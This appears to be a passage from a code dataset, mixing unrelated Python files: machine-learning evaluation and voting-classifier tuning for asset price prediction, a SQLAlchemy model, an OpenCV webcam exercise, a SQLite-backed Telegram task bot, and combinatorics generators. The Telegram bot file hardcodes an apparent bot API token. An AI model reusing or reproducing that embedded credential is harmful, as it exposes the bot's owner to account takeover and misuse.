optimal_params.update(param)\n\n # send the optimal model to the 'optimal models' dictionary\n optimal_models.update(mdl)\n optimal_params.update(param)\n\n # save the optimal mlp models\n if mlp:\n # clear keras session to speed up next round of random search\n K.clear_session()\n tf.reset_default_graph()\n\n return optimal_models, optimal_params\n\n\ndef return_validation_metrics(optimal_models, train_test_sets):\n \"\"\"\n Returns the performance measure(s) of optimal models on their\n respective sliding window.\n\n Models are evaluated on the validation sets if passed train/validation\n sets. E.g. 'sets_for_model_selection_spx'\n\n Parameters\n ----------\n optimal_models (dict): the optimal models for the respective\n classifier/asset combination\n train_test_sets (dict of matrices): dict containing the train and test\n matrices for each sliding window.\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # for each sliding window\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+1]\n y_train = list(train_test_sets.values())[i+2]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n clf_number = int(str(list(train_test_sets.keys())[i])[8])\n\n # extract the relevant model from optimal model dictionary\n clf = list(optimal_models.values())[clf_number]\n\n # fit the model\n clf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test,\n y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef return_validation_metrics_VC(sets_model_selection, train_test_sets,\n optimal_weights, rf_optimal, mlp_optimal,\n xgb_optimal):\n \"\"\"\n Returns the performance measure(s) of optimal models on their respective\n sliding window. Models are evaluated on the test sets.\n\n Pass in the optimal models for the respective classifier/asset combination.\n\n Parameters\n ----------\n sets_model_selection (dict): dict containing the train and validation\n sets for each sliding window.\n train_test_sets (sets):\n optimal_weights (dict): a dictionary w/ four vectors of optimal\n weights, one for each sliding window.\n [rf/mlp/xgb]_optimal: optimal models for a given asset\n E.g. 'rf_spx_optimal_models'\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(sets_model_selection), 4): # for each SW\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n # define the relevant training and test sets, and model\n X_train = list(sets_model_selection.values())[i]\n X_test = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_test = list(sets_model_selection.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # extract optimal weights for given sliding window\n vc_weights = list(optimal_weights.values())[sliding_window]\n\n eclf = VotingClassifier(estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n voting='soft',\n weights=vc_weights,\n n_jobs=1)\n\n # fit the model\n eclf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = eclf.predict(X_test)\n y_score = eclf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test,\n y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef tune_weights_ms(train_test_sets, sets_model_selection,\n rf_optimal, mlp_optimal, xgb_optimal):\n \"\"\"\n This determines the optimal weight for each classifier in\n the voting classifier ensemble.\n\n Assumes that optimal RF, MLP and XGB models are already saved in\n their respective dictionaries such as 'rf_spx_optimal_models',\n 'mlp_spx_optimal_models', and 'xgb_spx_optimal_models'. These\n dictionaries are created using model_selection().\n\n Parameters\n ----------\n train_test_sets: the dictionary containing the train/test split\n for each window E.g. 'set_spx'\n sets_model_selection: dict containing the train and validation\n sets for each sliding window.\n (e.g. 'sets_for_model_selection_us5yr')\n [rf/mlp/xgb]_optimal: optimal models for a given asset\n E.g. 'rf_spx_optimal_models'\n\n Returns\n -------\n optimal weights: a dictionary that contains four vectors of optimal\n weights, one for each sliding window\n \"\"\"\n # set up list of weights\n weights = []\n\n for w1 in range(1, 4):\n for w2 in range(1, 4):\n for w3 in range(1, 4):\n weights.append([w1, w2, w3])\n\n # dictionary to hold optimal models for each sliding window\n optimal_weights = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # i.e. for each SW\n # set up the voting classifier to be tuned\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n acc_all = []\n\n for w1 in range(1, 4):\n for w2 in range(1, 4):\n for w3 in range(1, 4):\n # assign the train and validation sets for the given SW\n X_train = list(sets_model_selection.values())[i]\n X_val = list(sets_model_selection.values())[i+1]\n y_train = list(sets_model_selection.values())[i+2]\n y_val = list(sets_model_selection.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_val = scaler.transform(X_val)\n\n eclf = VotingClassifier(\n estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n # prediction based on the argmax(sums pred probs)\n voting='soft',\n weights=[w1, w2, w3],\n n_jobs=1)\n\n eclf = eclf.fit(X_train, y_train.values.ravel())\n y_pred = eclf.predict(X_val)\n acc = metrics.accuracy_score(y_val, y_pred) # accuracy\n acc_all.append(acc)\n\n # identify the optimal VC weights for each sliding window\n weight_vector = {\n 'optimal_weights_sw' +\n str(list(sets_model_selection.keys())[i])[8]:\n # get weight mix associated with highest accuracy\n weights[acc_all.index(max(acc_all))]}\n\n # send the optimal model to the 'optimal models' dictionary\n optimal_weights.update(weight_vector)\n\n return optimal_weights\n\n\ndef filter_imp_vars(sets, important_cols):\n \"\"\"\n When passed a dict containing X_train and X_test sets\n of the sliding windows, this will remove features that\n aren't important, as determined by extract_imp_features().\n\n Parameters\n ----------\n sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n These sets are generated by walkforward_split().\n important_cols (dict): a dictionary containing the\n lists of feature indices deemed to be important\n for each sliding window.\n\n Returns\n -------\n sets_filtered (dict of matrices): dict containing the\n train and test matrices for each sliding window,\n with only important features included.\n \"\"\"\n\n sets_for_filtering = []\n\n # get X_train and X_test for each sliding window\n for set in np.arange(0, len(sets), 2):\n sets_for_filtering.append(list(sets.keys())[set])\n\n # cycle through the X_train and X_tests,\n # leaving the important variables for given sliding window.\n for set in enumerate(sets_for_filtering):\n # take the number from the end of the set's name e.g. \"X_train_0\" = 0\n # this tells us which key from dict \"indices\" to use\n indicie_to_use = int(str(set[1])[-1])\n\n # access only important variables for sliding window\n sets[set[1]] = sets[set[1]]\\\n .iloc[:, list(important_cols.values())[indicie_to_use]]\n\n return sets\n\n\ndef return_final_metrics(optimal_models, train_test_sets, mlp=None):\n \"\"\"\n Returns the performance measure(s) of optimal models on their\n respective sliding window. Models are evaluated on the test sets.\n\n Parameters\n ----------\n optimal_models (dict of objects): dict containing the optimal\n models for the respective classifier/asset combination.\n train_test_sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n # for each sliding window\n for i in np.arange(0, len(train_test_sets), 4):\n\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+2]\n y_train = list(train_test_sets.values())[i+1]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n clf_number = int(str(list(train_test_sets.keys())[i])[8])\n\n # extract the relevant model from optimal model dictionary\n clf = list(optimal_models.values())[clf_number]\n\n # fit the model\n clf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.\\\n precision_recall_curve(y_test, y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n # create a dict to hold metrics for the current sliding window\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n\n return all_metrics, y_tests, y_preds, y_scores\n\n\ndef return_final_metrics_VC(train_test_sets, optimal_weights, rf_optimal,\n mlp_optimal, xgb_optimal):\n \"\"\"\n Modified version of return_final_metrics_VC() which returns\n the performance measure(s) of the optimal VC model (which itself is\n made up of the optimal rf, mlp and xgb models determined via model\n selection). Metrics are returned for each sliding window.\n Models are evaluated on the test sets.\n\n Parameters\n ----------\n train_test_sets (dict of matrices): dict containing the train\n and test matrices for each sliding window.\n optimal_weights (dict of dicts): the optimal weights for the voting\n classifier for each sliding window. From tune_weights_ms().\n rf_optimal (dict of objects): optimal RFs for each SW, from model\n selection\n mlp_optimal (dict of objects): optimal MLPs for each SW, from model\n selection\n xgb_optimal (dict of objects): optimal XGBs for each SW, from model\n selection\n\n optimal_models (dict of objects): dict containing the optimal\n models for the respective classifier/asset combination.\n\n Returns\n -------\n all_metrics (dict of dicts): A dictionary of dictionaries containing\n performance measures\n E.g. metrics_0 : acc, auc... , metrics_1 : auc, acc... ,\n metrics_2 : auc, acc...\n y_tests (dict of dicts): A dictionary of dictionaries containing test\n set values\n y_preds (dict of dicts): A dictionary of dictionaries containing preds\n y_scores (dict of dicts): A dictionary of dictionaries containing\n scores\n \"\"\"\n\n all_metrics = {}\n y_tests = {}\n y_preds = {}\n y_scores = {}\n\n for i in np.arange(0, len(train_test_sets), 4): # for each sliding window\n\n sliding_window = int(str(list(train_test_sets.keys())[i])[8])\n clf1 = list(rf_optimal.values())[sliding_window] # RRFClassifier\n clf2 = list(mlp_optimal.values())[sliding_window] # KerasClassifier\n clf3 = list(xgb_optimal.values())[sliding_window] # XGBoostClassifier\n\n # define the relevant training and test sets, and model\n X_train = list(train_test_sets.values())[i]\n X_test = list(train_test_sets.values())[i+2]\n y_train = list(train_test_sets.values())[i+1]\n y_test = list(train_test_sets.values())[i+3]\n\n # normalise the data since MLP is a voter\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n\n # extract optimal weights for given sliding window\n vc_weights = list(optimal_weights.values())[sliding_window]\n\n eclf = VotingClassifier(estimators=[('rf', clf1),\n ('mlp', clf2),\n ('xgb', clf3)],\n voting='soft',\n weights=vc_weights,\n n_jobs=1)\n\n # fit the model\n eclf.fit(X_train, y_train.values.ravel())\n\n # make predictions\n y_pred = eclf.predict(X_test)\n y_score = eclf.predict_proba(X_test)[:, 1]\n\n # output performance metrics\n fpr, tpr, thresholds = metrics.roc_curve(\n y_test,\n y_score,\n drop_intermediate=False,\n pos_label=1)\n acc = metrics.accuracy_score(y_test, y_pred) # accuracy\n auc = metrics.auc(fpr, tpr)\n precision, recall, thresholds = metrics.precision_recall_curve(\n y_test, y_score)\n f1 = metrics.f1_score(y_test, y_pred)\n class_report = classification_report(y_test, y_pred)\n\n # http://scikit-learn.org/stable/modules/classes.html\n perf_metrics = {'metrics_sw' +\n str(list(train_test_sets.keys())[i][8]): {\n 'acc': acc,\n 'auc': auc,\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'cr': class_report,\n 'tpr': tpr,\n 'fpr': fpr}\n }\n\n y_test_temp = {'y_test_' +\n str(list(train_test_sets.keys())[i][8]): y_test}\n y_pred_temp = {'y_pred_' +\n str(list(train_test_sets.keys())[i][8]): y_pred}\n y_score_temp = {'y_score_' +\n str(list(train_test_sets.keys())[i][8]): y_score}\n\n all_metrics.update(perf_metrics)\n y_tests.update(y_test_temp)\n y_preds.update(y_pred_temp)\n y_scores.update(y_score_temp)\n return all_metrics, y_tests, y_preds, y_scores\n","repo_name":"tjb474/asset-price-prediction","sub_path":"Final/code/iPython notebooks/functions_modelling.py","file_name":"functions_modelling.py","file_ext":"py","file_size_in_byte":46779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36776368662","text":"from Application.database.initialize_database import Base, session\nfrom Application.database.sqlalchemy_imports import Integer,Column, String\n\nclass HomeImages(Base):\n __tablename__ = \"home_images\"\n\n image_id = Column(Integer, primary_key=True)\n info_type = Column(String(100), nullable=False)\n image_name = Column(String(100), nullable=False)\n image_desc = Column(String(500), nullable=True)\n\n def serialize(self):\n return {\n \"id\": self.image_id,\n \"info_type\": self.info_type, \n \"image_name\": self.image_name,\n \"image_desc\": self.image_desc\n }\n\n @classmethod\n def home_images(cls):\n try:\n images = cls.query.all()\n return [image.serialize() for image in images]\n\n except:\n session.rollback()\n\n @classmethod\n def read_image(cls, id):\n try:\n image = cls.query.filter_by(image_id=id).first()\n return image.serialize()\n except:\n session.rollback()\n\n @classmethod\n def delete_image(cls, id):\n try:\n image = cls.query.filter_by(image_id=id).first()\n if image:\n session.query(cls).filter_by(image_id=id).delete()\n session.commit()\n return True\n else:\n return False\n except:\n session.rollback()\n","repo_name":"Byenkya/ClickEat-Code","sub_path":"Application/database/models/click_eat_models/home_page_settings.py","file_name":"home_page_settings.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42191287558","text":"import sys\nimport numpy as np\nfrom skimage import io\nimport skimage.feature as sf\nimport matplotlib.pyplot as plt\nfrom sympy import *\nimport cv2 as cv\nfrom scipy import ndimage\n\n# 1\npicture = \"picture.png\"\ncam = cv.VideoCapture(0)\nwhile True:\n ret_val, img = cam.read()\n if cv.waitKey(1) == 27:\n cv.imwrite(picture, img)\n break\n elif img is None:\n sys.exit('Couldn`t read the image')\n break\n cv.imshow('My Webcam', img)\n\ndel cam\n\n# 2\nface_cv = cv.imread(picture)\ncv.imshow('Image', face_cv)\ncv.waitKey(0)\n\n# 3-a\nfig, ax = plt.subplots()\nface = io.imread(picture)\nplt.imshow(face)\nplt.show()\npoints, = ax.plot(40, 200, 'r*')\nx, y = points.get_data()\nprint(x, y)\n\n# 3-b\nimage = face\nimage = image[x[0]:x[0]+10, y[0]:y[0]+10]\nplt.imshow(image)\nplt.show()\ncv.waitKey(0)\n\n# 3-c\nired = np.zeros(face.shape)\nired[:, :, 0] = face[:, :, 0]\n\nigreen = np.zeros(face.shape)\nigreen[:, :, 1] = face[:, :, 1]\n\niblue = np.zeros(face.shape)\niblue[:, :, 2] = face[:, :, 2]\n\ncv.imshow('Blue', ired/255)\ncv.imshow('Green', igreen/255)\ncv.imshow('Red', iblue/255)\ncv.waitKey(0)\n\n# 4\ngray = cv.cvtColor(face_cv, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\ncv.waitKey(0)\n\n# 5\nkernel = np.ones((3, 3), np.float32)/25\nprint(kernel)\nfiltered_image = cv.filter2D(gray, -1, kernel)\ncv.imshow('Original Image', gray)\ncv.imshow('Blurred Image', filtered_image)\ngaussisan = cv.GaussianBlur(gray, (3, 3), 0)\ncv.imshow('Gaussian Blur', gaussisan)\ncv.waitKey(0)\n\n#6\nedges = cv.Laplacian(filtered_image, -1, ksize=5, scale=1, delta=0, borderType=cv.BORDER_DEFAULT)\ncv.imshow('Edges', edges)\ncv.waitKey(0)\n\n# 7\n#Magnitude\nf = np.fft.fft2(edges)\nfshift = np.fft.fftshift(f)\nmagnitude_spectrum = 20*np.log(np.abs(fshift))\nplt.imshow(magnitude_spectrum, cmap = 'gray')\n#Phase\ndft = np.fft.fft2(edges)\ndft_shift = np.fft.fftshift(dft)\nphase_spectrum = np.angle(dft_shift)\ncv.imshow(\"Phase\", phase_spectrum)\nplt.show()\ncv.waitKey(0)\n\n# 8\nplt.hist(face.ravel(), 256, [0, 256])\nplt.show()\n\n# 9\nmask = np.zeros(face.shape[:2], np.uint8)\nmask[200:450, 150:450] = 255\nmasked_img = cv.bitwise_and(face_cv,face_cv,mask = mask)\ncv.imshow('Masked Image', masked_img)\ncv.waitKey(0)\n\n# 10\nrotated = ndimage.rotate(face_cv, 60)\ncv.imshow(\"Rotated 60 degrees\", rotated)\n\nh_flip = cv.flip(face_cv, 1)\ncv.imshow(\"Horizontal Flip\", h_flip)\n\nv_flip = cv.flip(face_cv, 0)\ncv.imshow(\"Vertical FLip\", v_flip)\n\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"zsamamah/computer-vision","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31325296177","text":"from datetime import date, timedelta\nimport telebot\nimport sqlite3\nfrom djangoApp import datemanager\n\nAPI_key = '5623471620:AAFIDDb2ZgnxckPENindWH14PVnHAr7pp1Y'\n\nbot = telebot.TeleBot(API_key)\nconn = sqlite3.connect('C:\\\\Users\\\\Дом\\\\PycharmProjects\\\\djangoProject\\\\db.sqlite3', check_same_thread=False)\ncursor = conn.cursor()\n\n\ndef db_table_val(user_name: str):\n sql = \"select last_name from auth_user where last_name=:user_name\"\n sel = conn.cursor().execute(sql, {\"user_name\": user_name}).fetchall()\n if len(sel) != 0:\n return 1\n else:\n return 0\n\n\ndef db_tasks(user_name: str, date_day1: date, date_day2: date):\n sql = \"SELECT time_task, task_name, date_task FROM djangoapp_tasks t join auth_user u on u.id=t.user_id_id where last_name=:user_name and date_task between :date_task1 and :date_task2 and date_end='' order by date_task, time_task\"\n tasks = conn.cursor().execute(sql,\n {\"user_name\": user_name, \"date_task1\": date_day1, \"date_task2\": date_day2}).fetchall()\n return tasks\n\n\n@bot.message_handler(commands=['start'])\ndef get_command(message):\n if db_table_val(message.from_user.username) == 1:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , добро пожаловать! \\n Доступные команды: \\n /task_today - задачи на сегодня \\n /task_tomorrow - задачи на завтра \\n /task_week - задачи на неделю')\n sql = \"update auth_user set email=:id where last_name=:user_name\"\n conn.cursor().execute(sql, {\"user_name\": message.from_user.username, \"id\": message.chat.id})\n conn.commit()\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_today'])\ndef get_command(message):\n tasks = db_tasks(message.from_user.username, date.today(), date.today())\n task = ''\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n for l in range(len(tasks)):\n task += str(l + 1) + '. ' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на сегодня: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на сегодня не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_tomorrow'])\ndef get_command(message):\n dt = date.today() + timedelta(days=1)\n tasks = db_tasks(message.from_user.username, dt, dt)\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n task = ''\n for l in range(len(tasks)):\n task += str(l + 1) + '. ' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на завтра: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на завтра не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(commands=['task_week'])\ndef get_command(message):\n date1 = datemanager.DateManager().day_monday\n date2 = datemanager.DateManager().day_sunday\n tasks = db_tasks(message.from_user.username, date1, date2)\n if db_table_val(message.from_user.username) == 1 and len(tasks) != 0:\n task = ''\n for l in range(len(tasks)):\n task += tasks[l][2] + '. ' + tasks[l][0] + ': ' + tasks[l][1] + '\\n'\n bot.send_message(message.chat.id,\n message.from_user.first_name + ' , твои задания на неделю: ' + '\\n' + str(task))\n elif db_table_val(message.from_user.username) == 1 and len(tasks) == 0:\n bot.send_message(message.chat.id, message.from_user.first_name + ' , на текущую неделю не установлено задач')\n else:\n bot.send_message(message.chat.id,\n message.from_user.first_name + ', тебе необходимо зарегистрироваться на сайте')\n\n\n@bot.message_handler(content_types=['text'])\ndef start(message):\n if message.text == '/add_task':\n bot.send_message(message.from_user.id, \"Введи название задачи\")\n bot.register_next_step_handler(message, get_task_name)\n else:\n bot.send_message(message.from_user.id, 'Напиши /start')\n\n\ndef get_task_name(message):\n if message.text == '/end':\n pass\n else:\n global task_name\n task_name = message.text\n bot.send_message(message.from_user.id, 'Введи описание задачи')\n bot.register_next_step_handler(message, get_comment)\n\n\ndef get_comment(message):\n global task_comment\n task_comment = message.text\n bot.send_message(message.from_user.id, 'Введи дату задачи в формате гггг-мм-дд')\n bot.register_next_step_handler(message, get_date)\n\n\ndef get_date(message):\n global date_task\n date_task = message.text\n bot.send_message(message.from_user.id, 'Введи время задачи в формате чч:мм')\n bot.register_next_step_handler(message, get_time)\n\n\ndef get_time(message):\n global time_task\n time_task = message.text\n bot.send_message(message.from_user.id, 'Проверь данные: ' + '\\n' + 'Название:' + '\\n' + task_name +\n '\\n' + 'Описание:' + '\\n' + task_comment +\n '\\n' + 'Дата:' + '\\n' + date_task +\n '\\n' + 'Время:' + '\\n' + time_task + '\\n' + '\\n' +\n 'Данные верны? (Ответь \"Да\" или \"Нет\")')\n bot.register_next_step_handler(message, get_correct)\n\n\ndef get_correct(message):\n global correct_task\n correct_task = message.text\n if message.text == 'Да':\n bot.send_message(message.from_user.id, 'Данные внесены успешно')\n date_add = date.today().strftime(\"%Y-%m-%d\")\n sql_id = \"select id from auth_user where last_name=:user_name\"\n user_id_id = conn.cursor().execute(sql_id, {\"user_name\": message.from_user.username}).fetchall()[0][0]\n conn.cursor().execute(\n \"INSERT INTO djangoapp_tasks (task_name, task_comment, date_add, date_task, time_task, user_id_id, date_end) VALUES (?,?,?,?,?,?,?)\",\n (task_name, task_comment, date_add, date_task, time_task, int(user_id_id), ''))\n conn.commit()\n elif message.text == 'Нет':\n bot.send_message(message.from_user.id, \"Введи название задачи. \\nДля выхода нажми /end \")\n bot.register_next_step_handler(message, get_task_name)\n\n\nbot.polling(none_stop=True)\n","repo_name":"FedotovaVera/djangoProject","sub_path":"djangoApp/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11069001684","text":"from src.bvtlib.mongodb import get_track, get_autotest\n\ndef set_build_information(build, changes):\n \"\"\"make changes to records about build\"\"\"\n track = get_track()\n autotest = get_autotest()\n change = False\n builddoc = autotest.builds.find_one({'id':build})\n if builddoc:\n for field in changes:\n if changes[field] != builddoc.get(field):\n change = True\n if change:\n autotest.builds.update({'id':build}, {'$set':changes})\n track.updates.save({'build': build, 'action' : 'new build information'})\n","repo_name":"OpenXT/bvt","sub_path":"src/bvtlib/set_build_information.py","file_name":"set_build_information.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25454190834","text":"\"Functions that returns permutations of size n\"\n\n\ndef permutations(n):\n def perm_generator(n, prefix=[]):\n if len(prefix) == n:\n yield tuple(prefix)\n else:\n for i in range(1, n + 1):\n if i not in prefix:\n yield from perm_generator(n, prefix + [i])\n return list(perm_generator(n))\n\n\n\"Function that returns a sequence of n pairs of brackets \"\n\n\ndef correctbracketsequences(n):\n def brackets_generator(n, prefix='', balance=0):\n if balance == 0 and len(prefix) == 2 * n:\n yield prefix\n else:\n for i in ('(', ')'):\n new_p = prefix + i\n if i == '(':\n new_b = balance + 1\n else:\n new_b = balance - 1\n if len(new_p) <= 2 * n and new_b >= 0:\n yield from brackets_generator(n, new_p, new_b)\n return list(brackets_generator(n))\n\n\n\"Function that returns all combinations of numbers from n of size k\"\n\n\ndef combinationswithrepeats(n, k):\n def comb_generator(n, k, prefix=[]):\n if len(prefix) == k:\n yield tuple(prefix)\n else:\n if len(prefix) == 0:\n start = 1\n else:\n start = max(prefix)\n for i in range(start, n + 1):\n yield from (comb_generator(n, k, prefix + [i]))\n return list(comb_generator(n, k))\n\n\n\"\"\"Function that returns a list of all unsorted partitions of number n as a\nsorted tuple of numbers\"\"\"\n\n\ndef unorderedpartitions(n):\n def part_generator(n, prefix=[]):\n if sum(prefix) == n:\n yield tuple(prefix)\n else:\n if len(prefix) == 0:\n for i in range(1, n+1):\n new = prefix + [i]\n yield from part_generator(n, new)\n else:\n start = prefix[-1]\n for i in range(start, n - start + 2):\n new = prefix + [i]\n if sum(new) <= n:\n yield from part_generator(n, prefix + [i])\n return list(part_generator(n))\n\n\nif __name__ == '__main__':\n assert permutations(1) == [(1,)]\n assert permutations(2) == [(1, 2), (2, 1)]\n assert permutations(3) == [(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1),\n (3, 1, 2), (3, 2, 1)]\n print(\"permutations function - OK\")\n\n assert combinationswithrepeats(1, 1) == [(1,)]\n assert combinationswithrepeats(2, 2) == [(1, 1), (1, 2), (2, 2)]\n assert combinationswithrepeats(3, 2) == [(1, 1), (1, 2), (1, 3), (2, 2),\n (2, 